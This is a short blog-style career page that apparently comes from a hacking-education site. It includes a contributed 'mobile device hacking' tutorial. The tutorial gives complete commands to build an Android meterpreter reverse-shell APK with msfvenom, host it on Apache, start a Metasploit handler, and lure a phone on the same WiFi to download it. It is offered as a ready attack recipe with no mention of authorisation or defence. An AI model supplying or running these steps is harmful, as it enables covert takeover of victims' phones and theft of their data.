Ready to Start Your Career?

By: rgperry01
April 25, 2018
Want to be a Hacker? My Personal Journey

By: rgperry01
April 25, 2018

Bonus! *Cybrary Mashup*Thanks to @rohitkharat, here is a quick tutorial for mobile device hacking on the same WiFi network.
Start Kali Os on your Pc then.........
Open the terminal-> msfvenom -p android/meterpreter/reverse_tcp LHOST =(OWN IP) LPORT=4444 R > name.apk enter
service apache2 start
make the lol.apk file in desktop
otherlocations-> computer => var =>www =>html => indexfile (drag and drop name.apk file in this place)
for ip address open terminal and type ifconfig
type msfconsole( to open metasploit framework)
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST(OWN IP)
set LPORT 4444
show options
exploit
in mobile in same wireless network
open the browser and type (OWN IP)/Name.apk